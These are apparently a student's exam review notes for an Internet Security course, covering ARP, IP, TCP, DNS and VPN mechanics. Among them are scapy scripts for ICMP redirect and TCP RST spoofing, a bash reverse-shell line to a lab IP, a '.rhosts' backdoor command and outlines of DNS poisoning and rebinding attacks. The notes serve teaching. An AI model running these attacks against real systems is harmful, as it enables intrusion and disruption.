CSE-644: Internet Security (Final Review)
04 May 2020
- Exam date/time (Spring 2020)
- Sniff/spoof
- ARP: Address Resolution Protocol
- IP: Internet Protocol
- TCP: Transmission Control Protocol
- DNS: Domain Name System
- VPN: Virtual Private Network
- Linux Firewall
- PKI (Public Key Infrastructure)
- TLS: Transport Layer Security
- Secret-key Encryption
- One-way Hash Function
- BGP: Border Gateway Protocol
Exam date/time (Spring 2020)
May 05, 3-5 PM (online exam due to coronavirus!)
Sniff/spoof
- Promiscuous mode: the NIC passes every frame it receives to the kernel. Normally, only frames whose destination MAC address matches the NIC (plus broadcast frames) are passed to the kernel; all other frames are dropped by the hardware.
- Monitor mode: the wireless counterpart of promiscuous mode. It requires support from the hardware, and because wireless transmission is spread over different channels, it is sometimes impossible to capture all traffic in range.
- BSD Packet Filter (BPF)
- A filtering mechanism implemented inside the kernel.
- The filter is implemented in kernel space because it is costly to copy packets from the kernel to user space; unwanted packets are discarded before the copy happens.
- BPF Syntax
- Packet sniffing/spoofing
- Sniff: raw socket, `pcap`, `scapy`
- Spoof: raw socket, `scapy`
- Endianness
- Big endian: most significant byte first (e.g. Network, IBM PowerPC)
- Little endian: least significant byte first (e.g. x86, Qualcomm Hexagon)
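A quick way to see the two byte orders side by side is Python's `struct` module. This is only an illustrative sketch; the value `0x12345678` is an arbitrary example.

```python
import struct
import sys

value = 0x12345678

big = struct.pack(">I", value)      # big endian: most significant byte first
little = struct.pack("<I", value)   # little endian: least significant byte first
network = struct.pack("!I", value)  # "!" selects network byte order (big endian)

print(big.hex())      # 12345678
print(little.hex())   # 78563412
print(network == big) # True
print(sys.byteorder)  # byte order of the machine running this script
```

This is why header fields such as ports are converted with `htons`/`ntohs` before being written to or read from a packet on a little-endian host.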
ARP: Address Resolution Protocol
-
Purpose of ARP protocol: find the corresponding MAC address of an IP address inside a local network.
-
Three ways to conduct ARP cache poisoning
- Identities: M (attacker), A (victim), B
-
Goal: on machine A, B’s IP address is associated with M’s MAC address.
-
Using ARP request
-
Spoof a tampered request on behalf of B to A (as if B is requesting A’s MAC address)
-
ARP request
OPER=1 SHA=M's MAC SPA=B's IP TPA=A's IP
-
-
Using ARP reply
-
ARP reply (as if B is replying A’s ARP request)
OPER=2 SHA=M's MAC SPA=B's IP THA=A's MAC TPA=A's IP
-
-
Using ARP gratuitous message
-
Gratuitous message: a broadcast ARP message informing address changes to the entire network.
-
Characteristics: `OPER=1`, `SPA=TPA`, `THA=BROADCAST`
-
ARP packet
OPER=1 SHA=M's MAC SPA=B's IP THA=BROADCAST TPA=B's IP
-
-
We cannot use ARP to attack remote computers because ARP packets will not be routed on the Internet.
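The three poisoning messages differ only in a few ARP fields. The sketch below packs the 28-byte ARP payload with the standard library so the field values can be compared directly. All MAC and IP addresses are hypothetical, and setting THA to zero in the request is an assumption (the notes do not list THA for that case). Actually sending the frames would additionally need an Ethernet header and a raw socket or `scapy`.

```python
import socket
import struct

def mac_to_bytes(mac):
    """Convert 'aa:bb:cc:dd:ee:ff' into 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", ""))

def build_arp(oper, sha, spa, tha, tpa):
    """Pack the 28-byte ARP payload for IPv4 over Ethernet."""
    return struct.pack(
        "!HHBBH6s4s6s4s",
        1,        # HTYPE: Ethernet
        0x0800,   # PTYPE: IPv4
        6,        # HLEN: MAC address length
        4,        # PLEN: IPv4 address length
        oper,     # OPER: 1 = request, 2 = reply
        mac_to_bytes(sha), socket.inet_aton(spa),
        mac_to_bytes(tha), socket.inet_aton(tpa),
    )

# Hypothetical addresses for M (attacker), A (victim) and B.
M_MAC, A_MAC = "08:00:27:00:00:0d", "08:00:27:00:00:0a"
A_IP, B_IP = "10.0.2.5", "10.0.2.6"
ZERO, BROADCAST = "00:00:00:00:00:00", "ff:ff:ff:ff:ff:ff"

request = build_arp(1, M_MAC, B_IP, ZERO, A_IP)          # "B" asks for A's MAC
reply = build_arp(2, M_MAC, B_IP, A_MAC, A_IP)           # "B" answers A
gratuitous = build_arp(1, M_MAC, B_IP, BROADCAST, B_IP)  # SPA == TPA

for name, pkt in [("request", request), ("reply", reply), ("gratuitous", gratuitous)]:
    print(name, len(pkt), pkt.hex())
```

In all three cases SHA is M's MAC and SPA is B's IP, which is exactly the mapping we want A to cache.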
IP: Internet Protocol
- IP Header
- Version: 4
- Internet Header Length (IHL): length of the IP header, counted in 4-byte units. The minimum is 5 (the minimum IP header size is 20 bytes).
- Total length: the length of the entire packet, including header and data. Since it has 16 bits, the maximum size of an IP packet is \(2^{16} - 1 = 65535\) bytes.
- Identification: To identify the group of fragments of a single IP datagram.
- Flags:
- Bit 0: Reserved, must be zero
- Bit 1: Don’t fragment (DF) - can be used for path MTU discovery
- Bit 2: More fragments (MF)
- Fragment offset: the offset of this packet's data within the original datagram, counted in 8-byte units.
- Time to live: prevents an IP datagram from persisting on the Internet forever by limiting the packet's lifetime.
- Protocol: specifies the protocol of the payload.
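The header fields above can be pulled out of raw bytes with `struct`. The following is a minimal sketch that ignores IP options; the sample header is built by hand (its checksum is left at zero) and only mimics a middle fragment of a UDP datagram.

```python
import socket
import struct

def parse_ipv4_header(data):
    """Decode the fixed 20-byte part of an IPv4 header."""
    (ver_ihl, tos, total_len, ident, flags_frag,
     ttl, proto, checksum, src, dst) = struct.unpack("!BBHHHBBH4s4s", data[:20])
    return {
        "version": ver_ihl >> 4,
        "header_len": (ver_ihl & 0xF) * 4,           # IHL counts 4-byte units
        "total_len": total_len,
        "id": ident,
        "df": bool(flags_frag & 0x4000),             # don't fragment
        "mf": bool(flags_frag & 0x2000),             # more fragments
        "frag_offset": (flags_frag & 0x1FFF) * 8,    # offset counts 8-byte units
        "ttl": ttl,
        "protocol": proto,
        "src": socket.inet_ntoa(src),
        "dst": socket.inet_ntoa(dst),
    }

# Hand-built sample: version 4, IHL 5, MF set, offset 1480 bytes, protocol 17 (UDP).
sample = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 1500, 1, 0x2000 | (1480 // 8),
                     64, 17, 0,
                     socket.inet_aton("192.168.0.100"),
                     socket.inet_aton("192.168.0.1"))
print(parse_ipv4_header(sample))
```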
-
IP Address
- CIDR Notation
- 192.168.100.14/24 represents the IPv4 address 192.168.100.14 and its associated routing prefix 192.168.100.0, or equivalently, its subnet mask 255.255.255.0, which has 24 leading 1-bits.
- the IPv4 block 192.168.100.0/22 represents the 1024 IPv4 addresses from 192.168.100.0 to 192.168.103.255.
- 192.168.100.0/24 is equivalent to 192.168.100.0/255.255.255.0.
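The three CIDR statements above can be checked with Python's standard `ipaddress` module (a small sketch, using the same addresses as the bullets):

```python
import ipaddress

# An address together with its prefix length.
iface = ipaddress.ip_interface("192.168.100.14/24")
print(iface.network)   # 192.168.100.0/24
print(iface.netmask)   # 255.255.255.0

# A /22 block covers 2**(32-22) = 1024 addresses.
block = ipaddress.ip_network("192.168.100.0/22")
print(block.num_addresses)   # 1024
print(block[0], block[-1])   # 192.168.100.0 192.168.103.255

# Prefix-length and netmask notation describe the same network.
same = ipaddress.ip_network("192.168.100.0/255.255.255.0")
print(same == ipaddress.ip_network("192.168.100.0/24"))  # True
```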
-
IP fragmentation
-
The fragmented packets will have the same ID.
-
All packets except the last one will have MF flag set.
-
Sample fragmented IP traffic
- Total size of IP payload: UDPHDR(8) + PAYLOAD(10000) = 10008
- The length of each packet: ETHERHDR(14) + IP packet (IPHDR(20) + data)
- Therefore, each packet of length 1514 contains a 1500-byte IP packet, which means 1480 bytes of IP payload. The packet of length 1162 contains \(1162-14-20=1128\) bytes of IP payload. The total size of the payload is \(1480 \times 6 + 1128 = 10008\).
```
No.  Source         Destination  Protocol  Length  Info
5    192.168.0.100  192.168.0.1  IPv4      1514    Fragmented IP protocol (proto=UDP 17, off=0, ID=0001) [Reassembled in #11]
6    192.168.0.100  192.168.0.1  IPv4      1514    Fragmented IP protocol (proto=UDP 17, off=1480, ID=0001) [Reassembled in #11]
7    192.168.0.100  192.168.0.1  IPv4      1514    Fragmented IP protocol (proto=UDP 17, off=2960, ID=0001) [Reassembled in #11]
8    192.168.0.100  192.168.0.1  IPv4      1514    Fragmented IP protocol (proto=UDP 17, off=4440, ID=0001) [Reassembled in #11]
9    192.168.0.100  192.168.0.1  IPv4      1514    Fragmented IP protocol (proto=UDP 17, off=5920, ID=0001) [Reassembled in #11]
10   192.168.0.100  192.168.0.1  IPv4      1514    Fragmented IP protocol (proto=UDP 17, off=7400, ID=0001) [Reassembled in #11]
11   192.168.0.100  192.168.0.1  UDP       1162    50000 -> 50000 Len=10000
```
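The offsets in the capture follow directly from the MTU. Here is a small sketch that recomputes them, assuming a 1500-byte MTU and a 20-byte IP header without options (the function name `fragment` is just for illustration):

```python
def fragment(payload_len, mtu=1500, ip_header_len=20):
    """Return (byte offset, data length, MF flag) for each fragment."""
    # Every fragment except the last must carry a multiple of 8 bytes,
    # because the fragment offset field counts in 8-byte units.
    max_data = (mtu - ip_header_len) // 8 * 8
    fragments = []
    offset = 0
    while offset < payload_len:
        size = min(max_data, payload_len - offset)
        more = offset + size < payload_len
        fragments.append((offset, size, more))
        offset += size
    return fragments

frags = fragment(8 + 10000)  # UDP header + UDP payload
for offset, size, more in frags:
    print(f"off={offset:5d} field={offset // 8:4d} len={size:4d} MF={int(more)}")
```

It yields seven fragments: six of 1480 bytes with MF set, and a final one of 1128 bytes at offset 8880 with MF cleared.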
-
-
DOS attack with IP fragmentation: send a lot of fragments with the MF flag set and different IDs, so that the victim keeps allocating reassembly buffers for datagrams that never complete and runs out of memory. This problem has since been fixed, so the attack no longer works.
-
ICMP redirect attack
-
An ICMP redirect is an error message sent by a router to the sender of an IP packet. Redirects are used when a router believes a packet is being routed sub optimally and it would like to inform the sending host that it should forward subsequent packets to that same destination through a different gateway.
-
By default, Linux does not process redirect packets. To enable it, one needs to run:
[02/09/20]seed@vm2:~$ sudo sysctl net.ipv4.conf.all.accept_redirects=1
net.ipv4.conf.all.accept_redirects = 1
-
The construction of an ICMP redirect attack packet
- We spoof an ICMP redirect message on behalf of the network's router (10.0.2.1) and send it to the victim (10.0.2.6), informing the victim that packets sent to `10.0.0.1` should be routed via `10.0.2.5`.
```python
from scapy.all import *

# Outer IP header: pretend to be the router, addressed to the victim.
ip1 = IP(src='10.0.2.1', dst='10.0.2.6')
# type=5 is "redirect"; gw is the new gateway the victim should use.
icmp = ICMP(type=5, code=1, gw='10.0.2.5')
# The redirect must embed the header of the packet that "triggered" it.
ip2 = IP(src='10.0.2.6', dst='10.0.0.1')
udp = UDP(dport=9090)
packet = ip1/icmp/ip2/udp
send(packet)
```
-
If the destination IP is a local machine, this may not work because those packets will not be routed.
-
-
UDP: User Datagram Protocol
- UDP checksum is not always verified
TCP: Transmission Control Protocol
- TCP Header
- Data offset: the size of the TCP header in 4-byte units, which gives the offset at which the actual data starts. The minimum size of the TCP header is 20 bytes, so the minimum value of this field is 5.
- Flags
- SYN: synchronize sequence numbers. This is set during the three-way handshake.
- ACK: indicates that the ACK field is significant. This is set on every packet after the initial SYN.
- RST: reset the connection, i.e. terminate the connection immediately.
- Window size: the size of the receive window. This field is used for flow control.
- Urgent pointer: if the URG flag is set, this is the offset from the sequence number to the last byte of urgent data. Usually, urgent data has special handlers.
-
TCP Checksum computation
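To compute the TCP checksum, we need to construct a buffer that consists of a pseudo-header followed by the TCP header and data.
- The pseudo-header contains the source IP, the destination IP, a zero byte, the protocol number (6 for TCP) and the segment length.
- The segment length is the total length of the TCP header and payload.
- The original TCP header and payload are appended after this pseudo-header. Note that the checksum field in the TCP header should be initialized with zero!
-
The checksum is the 16-bit one's-complement Internet checksum (the same algorithm used for the IP header checksum) of the concatenated result. After computing the checksum, write the value back into the TCP header.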
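The procedure above can be sketched with the standard library only. The segment below is a hypothetical 20-byte header plus a 5-byte payload; the ports and addresses are example values, not taken from a real capture.

```python
import socket
import struct

def internet_checksum(data):
    """16-bit one's-complement sum of 16-bit words (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"                      # pad to a whole number of words
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold the carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def tcp_checksum(src_ip, dst_ip, segment):
    """Checksum over pseudo-header + TCP header + payload."""
    pseudo = struct.pack("!4s4sBBH",
                         socket.inet_aton(src_ip), socket.inet_aton(dst_ip),
                         0, socket.IPPROTO_TCP, len(segment))
    return internet_checksum(pseudo + segment)

# Hypothetical segment: 20-byte header with the checksum field set to zero.
header = struct.pack("!HHIIBBHHH", 65117, 9090, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
payload = b"hello"
csum = tcp_checksum("192.168.0.111", "192.168.0.100", header + payload)

# Write the value back into bytes 16..17 of the TCP header.
filled = header[:16] + struct.pack("!H", csum) + header[18:] + payload
print(hex(csum))
print(tcp_checksum("192.168.0.111", "192.168.0.100", filled))  # 0 when the checksum is correct
```

Recomputing the checksum over a segment that already carries a correct checksum gives zero, which is how a receiver verifies it.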
-
Sample TCP traffic
```
No.  Source         Destination    Protocol  Length  Info
58   192.168.0.111  192.168.0.100  TCP       78      65117 > 9090 [SYN] Seq=0 Win=65535 Len=0
59   192.168.0.100  192.168.0.111  TCP       74      9090 > 65117 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0
60   192.168.0.111  192.168.0.100  TCP       66      65117 > 9090 [ACK] Seq=1 Ack=1 Win=131712 Len=0
93   192.168.0.111  192.168.0.100  TCP       87      65117 > 9090 [PSH, ACK] Seq=1 Ack=1 Win=131712 Len=21
94   192.168.0.100  192.168.0.111  TCP       66      9090 > 65117 [ACK] Seq=1 Ack=22 Win=65152 Len=0
138  192.168.0.100  192.168.0.111  TCP       101     9090 > 65117 [PSH, ACK] Seq=1 Ack=22 Win=65152 Len=35
139  192.168.0.111  192.168.0.100  TCP       66      65117 > 9090 [ACK] Seq=22 Ack=36 Win=131712 Len=0
145  192.168.0.111  192.168.0.100  TCP       77      65117 > 9090 [PSH, ACK] Seq=22 Ack=36 Win=131712 Len=11
146  192.168.0.100  192.168.0.111  TCP       66      9090 > 65117 [ACK] Seq=36 Ack=33 Win=65152 Len=0
150  192.168.0.111  192.168.0.100  TCP       66      65117 > 9090 [FIN, ACK] Seq=33 Ack=36 Win=131712 Len=0
151  192.168.0.111  192.168.0.100  TCP       60      65117 > 9090 [RST, ACK] Seq=34 Ack=36 Win=131712 Len=0
```
-
SEQ and ACK numbers
-
Suppose A is sending a packet to B. Think of the SEQ number as a pointer to the first byte of this packet's data in A's send buffer, and think of the ACK number as a pointer to the next byte the sender of the ACK expects to receive. For example, when A sends a packet with SEQ=0, LEN=10, A has sent `buf[0]` to `buf[9]`. B is now expecting `buf[10]`, so the ACK from B will be 10.
-
Sample traffic
(Packet 1: A -> B) SEQ=x1 ACK=y1 LEN=z1
(Packet 2: B -> A) SEQ=y1 ACK=x1+z1 LEN=0 (ACK Packet)
(Packet 3: B -> A) SEQ=y1 ACK=x1+z1 LEN=z2
(Packet 4: A -> B) SEQ=x1+z1 ACK=y1+z2 LEN=0 (ACK Packet)
-
-
Three-way handshake: how a TCP connection starts
- The client sends a SYN packet with its initial SEQ number.
- The server responds with a SYN+ACK packet that carries the server's initial SEQ number and an ACK number equal to the client's SEQ plus one.
- The client responds with an ACK packet whose ACK number is the server's SEQ plus one.
- Although the message length is zero, the SYN flag consumes one sequence number, so the ACK number is incremented by one!
(Packet 1: A -> B) SEQ=x1 LEN=0 (SYN)
(Packet 2: B -> A) SEQ=y1 ACK=x1+1 LEN=0 (SYN+ACK)
(Packet 3: A -> B) SEQ=x1+1 ACK=y1+1 LEN=0 (ACK)
- SYN Flooding Attack
- Each server keeps a queue of half-open connections (SYN received, final ACK not yet received). SYN flooding spoofs a large number of SYN packets to the server, which fills this queue with malicious entries. If the queue is full, the server will no longer be able to accept new connections.
- Countermeasure: SYN Cookie
- When the connection queue is full, the server encodes some information about the connection (e.g. time, client's IP, port number) into the sequence number field of its SYN+ACK reply. The connection itself is not stored, which prevents the DOS attack.
- If the SYN came from an attacker using a spoofed source IP, the attacker will not receive this reply (because the source IP address is not his!).
- If the client is indeed interested in talking to the server, it will send an ACK packet back to the server. The server checks whether this packet has the correct ACK number, i.e. the value encoded from the client's information plus one. If so, the connection is established.
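The stateless check can be illustrated with a keyed hash. This is a simplified sketch of the idea only, not the Linux implementation (which also encodes values such as the MSS into the cookie). The secret, the `time_slot` counter and the connection tuple are all hypothetical.

```python
import hashlib
import hmac
import struct

SECRET = b"hypothetical-server-secret"  # assumption: a key known only to the server

def make_cookie(client_ip, client_port, server_ip, server_port, time_slot):
    """Derive a 32-bit initial sequence number from the connection details."""
    msg = f"{client_ip}:{client_port}>{server_ip}:{server_port}@{time_slot}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return struct.unpack("!I", digest[:4])[0]

def ack_is_valid(ack, client_ip, client_port, server_ip, server_port, time_slot):
    """Check a returning ACK without any stored per-connection state."""
    # Accept the current and the previous time slot to tolerate network delay.
    for slot in (time_slot, time_slot - 1):
        cookie = make_cookie(client_ip, client_port, server_ip, server_port, slot)
        if ack == (cookie + 1) & 0xFFFFFFFF:
            return True
    return False

conn = ("10.0.2.5", 40000, "10.0.2.7", 23)   # hypothetical connection
cookie = make_cookie(*conn, time_slot=100)   # sent as SEQ in the SYN+ACK
genuine_ack = (cookie + 1) & 0xFFFFFFFF      # what a real client sends back
print(ack_is_valid(genuine_ack, *conn, time_slot=100))
```

A client that never saw the SYN+ACK would have to guess a 32-bit value, while the server recomputes the cookie from the ACK packet itself and needs no queue entry.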
-
TCP RST Attack
-
Local attack: sniff the TCP packets on LAN and spoof RST packets with correct SEQ and ACK numbers.
-
Remote attack: the attacker cannot see the traffic, so he spoofs RST packets with guessed SEQ and ACK numbers and hopes that one of them is accepted.
-
Python attack code
```python
from scapy.all import *

def rst_attack(pkt):
    # Skip packets that already carry RST (including our own spoofed ones).
    if 'R' in pkt[TCP].flags:
        return
    baseSeq = pkt[TCP].ack
    baseAck = pkt[TCP].seq
    # Swap the endpoints so the reset appears to come from the receiver.
    ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
    tcp = TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport,
              flags='AR', seq=baseSeq, ack=baseAck+1)
    outPacket = ip/tcp
    send(outPacket)

sniff(filter='dst host 10.0.2.7 and tcp portrange 23-23', prn=rst_attack)
```
- Switch src IP and dst IP
- Flags=AR
- Fill the correct SEQ and ACK numbers
-
-
TCP Session Hijacking
-
Sample attack
-
The wireshark capture of the last packet
17 10.0.2.6 10.0.2.7 TCP 66 58520 → 23 [ACK] Seq=1911510874 Ack=145612526 Win=237 Len=0
-
Spoof a packet
SRC IP=10.0.2.7 DST IP=10.0.2.6 SEQ=145612526 ACK=1911510874
-
-
It is better to target ACK packets with LEN=0! In this case, we don’t need to compete with the actual sender on the network.
-
Why does the `telnet` session freeze?
If we hijack the session by spoofing a packet from A to B, B accepts the spoofed data and advances the sequence number it expects from A. B's replies then acknowledge data that A never sent, so A considers their ACK numbers invalid and drops them. Therefore, A never learns the new sequence state. Everything A sends to B afterwards is dropped as well, because its SEQ number is no longer valid for B.
-
Setting up a reverse shell
/bin/bash -i > /dev/tcp/10.0.2.5/9090 0<&1 2>&1
- `> /dev/tcp/10.0.2.5/9090` redirects `stdout` (file descriptor 1) to a TCP connection to port 9090 on 10.0.2.5.
- `0<&1` redirects `stdin` (file descriptor 0) to `stdout`, so input is read from the same TCP connection.
- `2>&1` redirects `stderr` (file descriptor 2) to `stdout`.
- `&` means file descriptor reference.
-
-
Mitnick attack
- Background: there is a protected machine “X-Terminal” and a trusted server. The remote shell program is the legacy `rsh`, which supports IP-address-based authentication that allows automatic login from certain IP addresses. The allowed addresses are stored in a file named `.rhosts`. In this case, the IP address of the trusted server has been added to this file, which means the trusted server can log in to X-Terminal without any authentication. Our goal is to set up a backdoor on X-Terminal so that we can also log in to X-Terminal without authentication.
- The attack
-
SYN flood the trusted server
We need to conduct a DOS attack on the trusted server first, so that it cannot interfere with the connection we are about to spoof. In the lab scenario, we simply disconnect the trusted server. In the real attack the flooded server could still respond to ARP requests, because only its TCP queue was attacked. A disconnected server cannot, so we should add a static ARP entry for the trusted server on the X-Terminal.
-
Spoof a SYN packet on behalf of the trusted server to X-Terminal
In this step, we try to establish a connection to the X-Terminal.
-
Spoof a ACK packet to X-Terminal
After step 2, the X-Terminal will send a SYN+ACK message. However, since it is addressed to the trusted server's IP address, we will not be able to receive the packet. Fortunately, the trusted server has been blocked and will not respond either. This grants us time to hijack the connection. To spoof a correct ACK packet, we need to know the SEQ number in X-Terminal's SYN+ACK response, because our ACK number must be that value plus one. In reality, Mitnick worked out the pattern of initial sequence numbers generated by the X-Terminal.
-
Spoof a command to install the backdoor
Because the IP of the trusted server has already been put in `.rhosts`, we are able to send and execute commands on the X-Terminal without any further authentication. We simply add our IP address to `.rhosts` and the attack is done. In reality, we can do `echo + + >> .rhosts` to allow arbitrary IP addresses. This also hides the attacker's identity.
-
DNS: Domain Name System
-
DNS server listens to UDP port 53
-
The hierarchical structure of DNS
- Root domain -> top level domains -> second-level domains
- A DNS query goes step by step from higher levels to lower levels, until a definitive answer is found.
- The DNS hierarchy is separated into zones, where each zone is a separately configured and managed portion of the DNS namespace.
- DNS Header
- A complete DNS packet: IPHDR+UDPHDR+DNSHDR
- QDCOUNT: number of question records
- ANCOUNT: number of answer records
- NSCOUNT: number of authority records
- ARCOUNT: number of additional records
- QR flag: specifies if the packet is a query (0) or response (1)
- AA flag: specifies whether the answer is authoritative. An authoritative answer comes from a name server that can provide a definitive answer for the domain name in the question section. For example, if I query `www.google.com` from `a.gtld-servers.net`, the response will not have the AA flag because the domain name is not managed by this server. However, if I query `www.google.com` from one of Google's name servers (e.g. `ns1.google.com`), the answer will have the AA flag.
- RD flag: specifies whether recursion is desired. If the query is recursive, the DNS server will iteratively search for the final answer on the client's behalf. Whether this is available or not depends on the DNS server's configuration.
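The header fields and flags above sit in the first 12 bytes of a DNS message. The following is a small parsing sketch; the sample header is packed by hand to resemble a referral response (QR and RD set, no answers, 13 authority and 27 additional records) and is not a captured packet.

```python
import struct

def parse_dns_header(data):
    """Decode the fixed 12-byte DNS header."""
    ident, flags, qd, an, ns, ar = struct.unpack("!6H", data[:12])
    return {
        "id": ident,
        "qr": (flags >> 15) & 1,   # 0 = query, 1 = response
        "aa": (flags >> 10) & 1,   # authoritative answer
        "rd": (flags >> 8) & 1,    # recursion desired
        "rcode": flags & 0xF,      # 0 = NOERROR
        "qdcount": qd,
        "ancount": an,
        "nscount": ns,
        "arcount": ar,
    }

# Hand-packed sample: flags 0x8100 = QR (bit 15) + RD (bit 8).
sample = struct.pack("!6H", 63490, 0x8100, 1, 0, 13, 27)
print(parse_dns_header(sample))
```

The transaction ID is the first 16-bit field, which is one of the values a remote attacker has to guess.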
-
DNS Records
-
A DNS message carries four types of records, one per section: question records, answer records, authority records and additional records.
-
Sample `dig` result (query `www.google.com` from root servers)
- Record type: NS (authority), A (IP address)
- 172800: TTL in seconds. Specifies how long this record may stay in the DNS cache.
```
; <<>> DiG 9.11.3-1ubuntu1.11-Ubuntu <<>> www.google.com @a.root-servers.net -4
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63490
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 13, ADDITIONAL: 27
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1472
;; QUESTION SECTION:
;www.google.com.            IN  A

;; AUTHORITY SECTION:
com.                172800  IN  NS  a.gtld-servers.net.
com.                172800  IN  NS  b.gtld-servers.net.
com.                172800  IN  NS  c.gtld-servers.net.
com.                172800  IN  NS  d.gtld-servers.net.
com.                172800  IN  NS  e.gtld-servers.net.
com.                172800  IN  NS  f.gtld-servers.net.
com.                172800  IN  NS  g.gtld-servers.net.
com.                172800  IN  NS  h.gtld-servers.net.
com.                172800  IN  NS  i.gtld-servers.net.
com.                172800  IN  NS  j.gtld-servers.net.
com.                172800  IN  NS  k.gtld-servers.net.
com.                172800  IN  NS  l.gtld-servers.net.
com.                172800  IN  NS  m.gtld-servers.net.

;; ADDITIONAL SECTION:
a.gtld-servers.net. 172800  IN  A   192.5.6.30
b.gtld-servers.net. 172800  IN  A   192.33.14.30
c.gtld-servers.net. 172800  IN  A   192.26.92.30
d.gtld-servers.net. 172800  IN  A   192.31.80.30
e.gtld-servers.net. 172800  IN  A   192.12.94.30
f.gtld-servers.net. 172800  IN  A   192.35.51.30
g.gtld-servers.net. 172800  IN  A   192.42.93.30
h.gtld-servers.net. 172800  IN  A   192.54.112.30
i.gtld-servers.net. 172800  IN  A   192.43.172.30
j.gtld-servers.net. 172800  IN  A   192.48.79.30
k.gtld-servers.net. 172800  IN  A   192.52.178.30
l.gtld-servers.net. 172800  IN  A   192.41.162.30
m.gtld-servers.net. 172800  IN  A   192.55.83.30

;; Query time: 26 msec
;; SERVER: 198.41.0.4#53(198.41.0.4)
;; WHEN: Sat May 02 18:14:53 EDT 2020
;; MSG SIZE  rcvd: 839
```
-
-
Local DNS attack
-
Providing an authoritative answer for a specific domain
In the lab scenario, we would like to specify an authoritative domain name server for a certain domain. Normally, we need to purchase a domain to do so. However, there is a way to avoid the cost. Suppose there are three machines A (User), B (Local DNS Server) and C (Authoritative Name Server). The following configuration allows A to view C as the domain name's authoritative name server.
- On machine A, set the DNS server to be B.
- On machine B, use a “forward” zone entry in the `BIND9` configuration to forward the DNS requests of a specific zone to C.
- Set up an authoritative zone in C's `BIND9` zone file.
- The attack
- The attacker sniffs DNS requests from A.
- Upon seeing a DNS request, the attacker constructs a DNS reply whose authority section names the attacker's own DNS server as the name server of the domain, and then spoofs the packet back to A.
- We choose to change the authority section because all further DNS queries on this domain will then go to the attacker's DNS server.
-
-
Remote DNS attack (Kaminsky attack)
- Challenges
- We do not know when the victim will send out DNS query.
- If the reply is cached by the victim, it will take a long time before the attacker can try again.
- We do not know the DNS transaction number and UDP source port.
- The attack
- The attacker queries the victim for a random name in `example.com` (e.g. `abcdef.example.com`). Because the victim does not have the answer for this domain name, it will send out a DNS query.
- While the victim is waiting for the reply, the attacker spoofs DNS replies with random transaction numbers and UDP destination port numbers. The authority section names the attacker's DNS server, and the answer section contains an IP resolution for the random domain name. If one of the packets has the correct combination, the attack is successful, and the name server for `example.com` becomes the attacker's name server.
- If the spoofed responses fail, the attacker repeats from step 1. Because the new random name is not in the victim's DNS cache, the victim will send a new DNS query.
- DNS Rebinding attack
- Background: the attack is used to defeat the Same Origin Policy (SOP) of web browsers. Suppose there are two machines A and B behind a firewall, and A is not reachable from outside. When B's user browses the attacker's website, the attacker normally does not have access to A, because the SOP only allows AJAX code to interact with the website's own domain. The DNS rebinding attack works by rebinding the attacker's domain name to A's IP address. When the AJAX code sends requests to that domain, it actually talks to machine A. This allows the attacker to manipulate a machine hidden behind a firewall.
- The attack
- At the beginning, the attacker's domain name is mapped to its real IP address. The TTL of the DNS response is set to be very small (e.g. 2 seconds) for the rebinding attack to work.
- The user of machine B browses the attacker's website. The malicious JavaScript code begins to run on B.
- After a while, the AJAX code on the page sends a request to the attacker's domain. Because the cached DNS record has already expired, B queries the attacker's name server for the IP address again. This time the name server answers with A's IP address. Therefore, the request is sent to A.
-
Countermeasure
- DNSSEC: protects DNS responses with digital signatures.
-
Amplification attack
One can spoof DNS queries (which are small) with the victim's IP as the source address. This will direct a large volume of DNS responses (which are much larger than the queries) to the victim.
VPN: Virtual Private Network
- This is the architecture of a TUN/TAP based VPN. The mechanism of some IPsec based VPN is a little bit different.
-
TUN/TAP Interface: they serve as a way to extract packets from the kernel space. TUN/TAP interfaces have two ends: the network end and file system end. In the routing table, we can route packets to the network end of TUN/TAP interface. Then, the user program can read packets out from TUN/TAP’s file system end.
-
How VPN works
Suppose there are three computers A (VPN user), B (VPN server) and C (machine behind firewall).
- A’s IP: 10.0.2.5
- B’s IP: 10.0.2.6, 192.168.60.1 (two NICs)
- C’s IP: 192.168.60.101
- A TUN interface is created on A with IP address 192.168.50.5. The 192.168.50.0/24 subnet is reserved for TUN interfaces. In A's routing table, all traffic that goes to 192.168.50.0/24 is routed to `tun0` (usually this is set automatically when you assign an IP address to a TUN interface). All traffic that goes to 192.168.60.0/24 is routed to `tun0` as well.
- A VPN program on A reads packets out of `tun0` and sends them to the VPN server via the Internet. (The src IP of packets coming out of `tun0` is 192.168.50.5, because they are routed and emitted by `tun0`.)
- The VPN server program on B receives the packet. B also has a TUN interface, called `tun1`, with IP address 192.168.50.1. The VPN program writes the packets into `tun1`. The OS then routes them to the NIC with IP address 192.168.60.1, and C receives the packet.
- For packets to come back, on C, the 192.168.50.0/24 subnet is routed to 192.168.60.1.
-
Corresponding VPN setup script
-
Machine A
sudo ifconfig tun0 192.168.50.5/24 up
sudo route add -net 192.168.60.0/24 tun0
-
Machine B
Remember to turn on IP forwarding!
sudo ifconfig tun1 192.168.50.1/24 up
sudo sysctl net.ipv4.ip_forward=1
-
Machine C
sudo route add -net 192.168.50.0/24 gw 192.168.60.1
-
-
Maintaining packet boundary
When packets are sent from A to B, if we are using UDP, each `read` system call returns exactly one UDP payload, so the packet boundary is maintained automatically. However, if we are using TCP, the number of bytes returned by the system call is undetermined: it could be less than, equal to or larger than the actual packet size. Therefore, special measures need to be taken to maintain packet boundaries when the protocol between A and B is TCP. For example, we can prepend a header that contains the packet size to each packet.
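A minimal sketch of such a length-prefixed framing is shown below. The 2-byte big-endian length header and the helper names are assumptions made for this example; a local `socketpair` stands in for the TCP tunnel between A and B.

```python
import socket
import struct

def send_packet(sock, packet):
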